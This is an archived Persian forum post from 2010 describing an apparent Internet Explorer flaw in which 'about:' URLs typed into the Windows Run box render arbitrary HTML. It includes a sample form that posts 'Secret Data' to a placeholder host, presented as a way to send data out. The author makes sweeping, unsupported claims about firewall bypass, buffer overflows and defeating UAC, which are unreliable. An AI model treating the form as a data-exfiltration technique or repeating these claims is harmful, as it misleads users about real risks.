PDA

توجه ! این یک نسخه آرشیو شده می باشد و در این حالت شما عکسی را مشاهده نمی کنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : امکان طراحی Html به صورت Dynamic از طریق یک باگ خطرناک در IE



Borna66
06-15-2010, 09:25 PM
ماجرای آشکار شدن باگها و نقاط ضعف محصولات مایکروسافت، داستان تازه‌ای نیست. با بررسی عملکرد این شرکت در سالهای گذشته می‌توان گفت که تیم توسعه محصولات مایکروسافت، تقریبا از وجود بیشتر باگهای معروف موجود در نرم‌افزارهای خود مطلع هستند، اما بنا به مصلحت و حفظ منافع شرکت، عملا تا زمانی که باگهای مذکور به طور علنی مورد انتقاد و اطلاع رسانی کاربران قرار نگرفته باشند، عملی برای برطرف سازی آنها انجام نخواهند داد.

البته اتخاذ چنین رویکردی از طرف کارمندان شرکت مذکور، برای اکثر متخصصان و اهالی فن (برنامه‌نویسان، توسعه دهندگان و اشخاصی که از دشواری تولید محصولات آگاه هستند) قابل درک است، اما در عین قابل درک بودن، به هیچ وجه قابل دفاع نیست. معمولا در چنین مواردی بزرگترین قشر آسیب‌دیدگان، کاربران عادی سیستم‌ها هستند.

در این میان، گاه مشکلات و نقص‌‌های امنیتی مورد بحث آنچنان مهم و بحرانی هستند که سوءاستفاده از آنها منجر به آلوده‌سازی هزاران کاربر در سراسر دنیا و وارد شدن صدمه جدی به سطح وسیعی از اطلاعات کاربران می‌گردد.
با نگاهی به نقص‌های امنیتی که در گذشته معرفی شده‌اند، می‌توان دریافت که آنهایی که به نوعی با Internet Explorer مرتبط بوده‌اند، مشکلات بزرگتری به وجود آورده‌اند. (به عنوان مثال مشکلات مربوط به تگهای Script و Embed که در گذشته با سوء استفاده از آنها، Cookie Hijacking صورت می‌گرفت)

در این مطلب هم بنده قصد دارم در مورد مشکل امنیتی خطرناکی در IE صحبت کنم که با استفاده از آن به راحتی می‌توان یک صفحه وب کاملا داینامیک تولید کرد. این مشکل مربوط به استفاده از کلمه کلیدی “about:” در url های IE است.
احتمالا تا کنون محتوای آدرسهای about:blank و about:tabs را مشاهده نموده‌اید. مشکل از اینجا ناشی می‌شود که در حالت خاصی می‌توان با استفاده از about: محتوای صفحه را به صورت داینامیک تغییر داده و حتی با استفاده از Jscript ها، اقدام به ارسال هر داده دلخواهی به وب نمود.

برای روشن شدن موضوع، این متن را در پنجره RUN اجرا نمایید:


about:<body



bgcolor=#C5EBEB><h1>Hello my friend,<h2><a href= "http://www.Borna66.ir">Borna66.ir </a></body>
اکنون به اجرای این متن بپ‍ردازید:








about:<form name="xform" enctype="multipart/form-data" method="POST"

action="http://mail.php"><input type="text" name="add"
size="40" value="Secret Data"><input type="text"
name="abc" size="40" value="***"><input
type="submit" value="Submit"></form>



همانطور که میبینید با استفاده از این باگ، هر صفحه‌ای با هر محتوایی را می‌توان به صورت داینامیک (OnTheFly) در IE درست کرد. (البته اندازه متن ورودی در پنجره RUN دارای محدودیتی است که به سادگی قابل عبور می‌باشد)

لازم به ذکر نیست که با استفاده از چنین باگی به سادگی می‌توان مشکلاتی جدی برای IE و امنیت کاربران به وجود آورد. شخصا می‌توانم کاربردهایی برای ایجاد BOF، اجرای انواع Script های غیر مجاز، ارسال اطلاعات با عبور از دیوار آتش، Spamming و ... برای این باگ متصور شوم.

بخش جالب داستان اینجاست که این باگ در ویندوز ویستا هم که ادعای امنیت آن گوش کاربران را کر کرده، وجود داشته و با استفاده از آن به راحتی می‌توان Windows Defender، UAC،Windows Firewall و مابقی اهالی را حسابی شرمنده کرد.



پ.ن: از اینکه آیا این مشکل امنیتی در ویندوز هفت برطرف شده است یا خیر اطلاعی ندارم، اما با استناد به دو پاراگراف اول این نوشته، می‌توان فرض کرد که هنوز برطرف نشده است.
پ.ن: تا کنون با تعدادی از این قبیل مشکلات امنیتی که همچنان در ویندوز ویستا، خودنمایی می‌کنند روبرو شده‌ام که احتمالا در آینده مطالبی در مورد آنها خواهم نگاشت.